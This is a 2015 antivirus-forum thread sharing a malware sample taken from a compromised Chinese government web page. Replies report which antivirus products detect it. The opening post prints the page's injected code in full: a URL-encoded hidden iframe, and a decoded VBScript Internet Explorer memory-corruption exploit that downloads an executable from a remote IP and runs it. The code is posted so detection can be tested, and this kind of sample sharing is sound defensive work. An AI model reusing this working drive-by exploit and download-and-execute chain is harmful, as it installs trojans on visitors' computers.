查看: 5623|回复: 17
收起左侧

[病毒样本] calc.exe

[复制链接]
heishen2010
发表于 2015-4-30 22:09:39 | 显示全部楼层 |阅读模式
挂马页面:hxxp://nyj.longmen.gov.cn/onews.asp?id=369

[mw_shl_code=html,true]<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3Ciframe%20src%3Dhttp%3A//220.128.95.71%20width%3D0%20height%3D0%3E%3C/iframe%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>[/mw_shl_code]

[mw_shl_code=html,true]<iframe src=http://220.128.95.71 width=0 height=0></iframe>[/mw_shl_code]

[mw_shl_code=html,true]<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--


var Words ="%3C%21doctype%20html%3E%0A%3Chtml%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEmulateIE8%22%20%3E%0A%3Chead%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0A%0Afunction%20runmumaa%28%29%20%0AOn%20Error%20Resume%20Next%0ASet%20objWsh%20%3D%20CreateObject%28%22Wscript.Shell%22%29%0A%0AobjWsh.run%20%22cmd.exe%20/c%20echo%20%3E%3Ec%3A%5Ctext.vbs%20Set%20xPost%3DcreateObject%28%22%22Microsoft.XMLHTTP%22%22%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20xPost.Open%20%22%22GET%22%22%2C%22%22http%3A//220.128.95.71/calc.exe%22%22%2C0%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20xPost.Send%28%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20set%20sGet%3DcreateObject%28%22%22ADODB.Stream%22%22%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Mode%3D3%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Type%3D1%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Open%28%29%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.Write%20xPost.ResponseBody%20%26%20echo%20%3E%3Ec%3A%5Ctext.vbs%20sGet.SaveToFile%20%22%22c%3A%5Cputty.exe%22%22%2C2%22%2C0%0AobjWsh.run%20%22cscript.exe%20c%3A%5Ctext.vbs%22%2C0%2Ctrue%0Awscript.sleep%2010000%0AobjWsh.run%20%22c%3A%5Cputty.exe%22%0Adocument.write%28Err.Description%29%0Aend%20function%0A%0A%3C/script%3E%0A%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0A%20%0Adim%20%20%20aa%28%29%0Adim%20%20%20ab%28%29%0Adim%20%20%20a0%0Adim%20%20%20a1%0Adim%20%20%20a2%0Adim%20%20%20a3%0Adim%20%20%20win9x%0Adim%20%20%20intVersion%0Adim%20%20%20rnda%0Adim%20%20%20funclass%0Adim%20%20%20myarray%0A%0ABegin%28%29%0A%0Afunction%20Begin%28%29%0A%20%20On%20Error%20Resume%20Next%0A%20%20info%3DNavigator.UserAgent%0A%0A%20%20if%28instr%28info%2C%22Win64%22%29%3E0%29%20%20%20then%0A%20%20%20%20%20exit%20%20%20function%0A%20%20end%20if%0A%0A%20%20if%20%28instr%28info%2C%22MSIE%22%29%3E0%29%20%20%20then%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20intVersion%20%3D%20CInt%28Mid%28info%2C%20InStr%28info%2C%20%22MSIE%22%29%20+%205%2C%202%29%29%20%20%20%0A%20%20else%0A%20%20%20%20%20exit%20%20%20function%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20end%20if%0A%0A%20%20win9x%3D0%0A%0A%20%20BeginInit%28%29%0A%20%20If%20Create%28%29%3DTrue%20Then%0A%20%20%20%20%20myarray%3D%20%20%20%20%20%20%20%20chrw%2801%29%26chrw%282176%29%26chrw%2801%29%26chrw%2800%29%26chrw%2800%29%26chrw%2800%29%26chrw%2800%29%26chrw%2800%29%0A%20%20%20%20%20myarray%3Dmyarray%26chrw%2800%29%26chrw%2832767%29%26chrw%2800%29%26chrw%280%29%0A%0A%20%20%20%20%20if%28intVersion%3C4%29%20then%0A%20%20%20%20%20%20%20%20%20document.write%28%22%3Cbr%3E%20IE%22%29%0A%20%20%20%20%20%20%20%20%20document.write%28intVersion%29%0A%20%20%20%20%20%20%20%20%20runshellcode%28%29%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20else%20%20%0A%20%20%20%20%20%20%20%20%20%20setnotsafemode%28%29%0A%20%20%20%20%20end%20if%0A%20%20end%20if%0Aend%20function%0A%0Afunction%20BeginInit%28%29%0A%20%20%20Randomize%28%29%0A%20%20%20redim%20aa%285%29%0A%20%20%20redim%20ab%285%29%0A%20%20%20a0%3D13+17*rnd%286%29%0A%20%20%20a3%3D7+3*rnd%285%29%0Aend%20function%0A%0Afunction%20Create%28%29%0A%20%20On%20Error%20Resume%20Next%0A%20%20dim%20i%0A%20%20Create%3DFalse%0A%20%20For%20i%20%3D%200%20To%20400%0A%20%20%20%20If%20Over%28%29%3DTrue%20Then%0A%20%20%20%20%27%20%20%20document.write%28i%29%20%20%20%20%20%0A%20%20%20%20%20%20%20Create%3DTrue%0A%20%20%20%20%20%20%20Exit%20For%0A%20%20%20%20End%20If%20%0A%20%20Next%0Aend%20function%0A%0Asub%20testaa%28%29%0Aend%20sub%0A%0Afunction%20mydata%28%29%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20%20i%3Dtestaa%0A%20%20%20%20%20i%3Dnull%0A%20%20%20%20%20redim%20%20Preserve%20aa%28a2%29%20%20%0A%20%20%0A%20%20%20%20%20ab%280%29%3D0%0A%20%20%20%20%20aa%28a1%29%3Di%0A%20%20%20%20%20ab%280%29%3D6.36598737437801E-314%0A%0A%20%20%20%20%20aa%28a1+2%29%3Dmyarray%0A%20%20%20%20%20ab%282%29%3D1.74088534731324E-310%20%20%0A%20%20%20%20%20mydata%3Daa%28a1%29%0A%20%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%20%0Aend%20function%20%0A%0A%0Afunction%20setnotsafemode%28%29%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20i%3Dmydata%28%29%20%20%0A%20%20%20%20i%3Dreadmemo%28i+8%29%0A%20%20%20%20i%3Dreadmemo%28i+16%29%0A%20%20%20%20j%3Dreadmemo%28i+%26h134%29%20%20%0A%20%20%20%20for%20k%3D0%20to%20%26h60%20step%204%0A%20%20%20%20%20%20%20%20j%3Dreadmemo%28i+%26h120+k%29%0A%20%20%20%20%20%20%20%20if%28j%3D14%29%20then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20j%3D0%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20redim%20%20Preserve%20aa%28a2%29%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20aa%28a1+2%29%28i+%26h11c+k%29%3Dab%284%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%20%0A%0A%20%20%20%20%20j%3D0%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20j%3Dreadmemo%28i+%26h120+k%29%20%20%20%0A%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Exit%20for%0A%20%20%20%20%20%20%20%20%20%20%20end%20if%0A%0A%20%20%20%20next%20%0A%20%20%20%20ab%282%29%3D1.69759663316747E-313%0A%20%20%20%20runmumaa%28%29%20%0Aend%20function%0A%0Afunction%20Over%28%29%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20dim%20type1%2Ctype2%2Ctype3%0A%20%20%20%20Over%3DFalse%0A%20%20%20%20a0%3Da0+a3%0A%20%20%20%20a1%3Da0+2%0A%20%20%20%20a2%3Da0+%26h8000000%0A%20%20%0A%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%0A%20%20%20%20redim%20%20%20ab%28a0%29%20%20%20%20%20%0A%20%20%0A%20%20%20%20redim%20%20Preserve%20aa%28a2%29%0A%20%20%0A%20%20%20%20type1%3D1%0A%20%20%20%20ab%280%29%3D1.123456789012345678901234567890%0A%20%20%20%20aa%28a0%29%3D10%0A%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20If%28IsObject%28aa%28a1-1%29%29%20%3D%20False%29%20Then%0A%20%20%20%20%20%20%20if%28intVersion%3C4%29%20then%0A%20%20%20%20%20%20%20%20%20%20%20mem%3Dcint%28a0+1%29*16%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20j%3Dvartype%28aa%28a1-1%29%29%0A%20%20%20%20%20%20%20%20%20%20%20if%28%28j%3Dmem+4%29%20or%20%28j*8%3Dmem+8%29%29%20then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%28vartype%28aa%28a1-1%29%29%3C%3E0%29%20%20Then%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20If%28IsObject%28aa%28a1%29%29%20%3D%20False%20%29%20Then%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20type1%3DVarType%28aa%28a1%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20end%20if%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20end%20if%0A%20%20%20%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20%20%20redim%20%20Preserve%20aa%28a0%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20exit%20%20function%0A%0A%20%20%20%20%20%20%20%20%20%20%20end%20if%20%0A%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20if%28vartype%28aa%28a1-1%29%29%3C%3E0%29%20%20Then%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20If%28IsObject%28aa%28a1%29%29%20%3D%20False%20%29%20Then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20type1%3DVarType%28aa%28a1%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20end%20if%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20end%20if%0A%20%20%20%20%20%20%20%20end%20if%0A%20%20%20%20end%20if%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20If%28type1%3D%26h2f66%29%20Then%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20Over%3DTrue%20%20%20%20%20%20%0A%20%20%20%20End%20If%20%20%0A%20%20%20%20If%28type1%3D%26hB9AD%29%20Then%0A%20%20%20%20%20%20%20%20%20%20Over%3DTrue%0A%20%20%20%20%20%20%20%20%20%20win9x%3D1%0A%20%20%20%20End%20If%20%20%0A%0A%20%20%20%20redim%20%20Preserve%20aa%28a0%29%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%0Aend%20function%0A%0Afunction%20ReadMemo%28add%29%20%0A%20%20%20%20On%20Error%20Resume%20Next%0A%20%20%20%20redim%20%20Preserve%20aa%28a2%29%20%20%0A%20%20%0A%20%20%20%20ab%280%29%3D0%20%20%20%0A%20%20%20%20aa%28a1%29%3Dadd+4%20%20%20%20%20%0A%20%20%20%20ab%280%29%3D1.69759663316747E-313%20%20%20%20%20%20%20%0A%20%20%20%20ReadMemo%3Dlenb%28aa%28a1%29%29%20%20%0A%20%20%20%0A%20%20%20%20ab%280%29%3D0%20%20%20%20%0A%20%0A%20%20%20%20redim%20%20Preserve%20aa%28a0%29%0Aend%20function%0A%0A%3C/script%3E%0A%0A%3C/body%3E%0A%3C/html%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>[/mw_shl_code]

[mw_shl_code=html,true]<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")

objWsh.run "cmd.exe /c echo >>c:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>c:\text.vbs xPost.Open ""GET"",""http://220.128.95.71/calc.exe"",0 & echo >>c:\text.vbs xPost.Send() & echo >>c:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>c:\text.vbs sGet.Mode=3 & echo >>c:\text.vbs sGet.Type=1 & echo >>c:\text.vbs sGet.Open() & echo >>c:\text.vbs sGet.Write xPost.ResponseBody & echo >>c:\text.vbs sGet.SaveToFile ""c:\putty.exe"",2",0
objWsh.run "cscript.exe c:\text.vbs",0,true
wscript.sleep 10000
objWsh.run "c:\putty.exe"
document.write(Err.Description)
end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE")   5, 2))   
  else
     exit   function  
            
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13 17*rnd(6)
   a3=7 3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)     
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1 2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function


function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=readmemo(i 8)
    i=readmemo(i 16)
    j=readmemo(i &h134)  
    for k=0 to &h60 step 4
        j=readmemo(i &h120 k)
        if(j=14) then
              j=0         
              redim  Preserve aa(a2)            
     aa(a1 2)(i &h11c k)=ab(4)
              redim  Preserve aa(a0)  

     j=0
              j=readmemo(i &h120 k)   
         
               Exit for
           end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0 a3
    a1=a0 2
    a2=a0 &h8000000
  
    redim  Preserve aa(a0)
    redim   ab(a0)     
  
    redim  Preserve aa(a2)
  
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
         
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0 1)*16            
           j=vartype(aa(a1-1))
           if((j=mem 4) or (j*8=mem 8)) then
              if(vartype(aa(a1-1))<>0)  Then   
                 If(IsObject(aa(a1)) = False ) Then            
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then   
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
              
   
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  

    redim  Preserve aa(a0)         
        
end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)  
  
    ab(0)=0   
    aa(a1)=add 4     
    ab(0)=1.69759663316747E-313      
    ReadMemo=lenb(aa(a1))  
   
    ab(0)=0   

    redim  Preserve aa(a0)
end function

</script>

</body>
</html>[/mw_shl_code]

[mw_shl_code=html,true]http://220.128.95.71/calc.exe[/mw_shl_code]

样本文件:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
230f4
发表于 2015-4-30 22:11:13 来自手机 | 显示全部楼层
ess–enu
Flying_Bird
发表于 2015-4-30 22:11:59 | 显示全部楼层
ESS-CH killed.
calc.exe - Win32/Hupigon 特洛伊木马 的变种

评分

参与人数 1人气 +1 收起 理由
jayavira + 1 版区有你更精彩: )

查看全部评分

skyboybone
发表于 2015-4-30 22:13:05 | 显示全部楼层
金山杀exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
学雷锋做人
头像被屏蔽
发表于 2015-4-30 22:15:49 | 显示全部楼层
本帖最后由 学雷锋做人 于 2015-4-30 22:24 编辑

360安全卫士(关伞):2个

FD:1个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
__情义丶飞雪
发表于 2015-4-30 22:17:08 | 显示全部楼层
卡巴kill
这样痴痴爱着你
发表于 2015-4-30 22:25:00 | 显示全部楼层
火绒杀exe~
欧阳宣
头像被屏蔽
发表于 2015-4-30 22:27:28 | 显示全部楼层
bd杀exe和html
aboringman
发表于 2015-4-30 22:30:20 | 显示全部楼层
本帖最后由 aboringman 于 2015-5-1 10:41 编辑

[mw_shl_code=css,true]When accessing data from the URL, "http://220.128.95.71/"
a virus or unwanted program 'HTML/ExpKit.Gen2' [virus] was found.
Action taken: Blocked file
[/mw_shl_code]


样本:
[mw_shl_code=css,true]The file 'C:\Documents and Settings\adminstartor\桌面\calc.exe\index.html'
contained a virus or unwanted program 'HTML/ExpKit.Gen2' [virus]
Action(s) taken:
The file was moved to the quarantine directory under the name '51df984c.qua'![/mw_shl_code]
[mw_shl_code=css,true]Virus or unwanted program 'DR/Delphi.Gen [dropper]'
detected in file 'C:\Documents and Settings\adminstartor\桌面\calc.exe\calc.exe.
Action performed: Deny access[/mw_shl_code]

补充:除首页外,其他页面皆报。
vm001
发表于 2015-4-30 22:34:19 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-25 17:30 , Processed in 0.147697 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表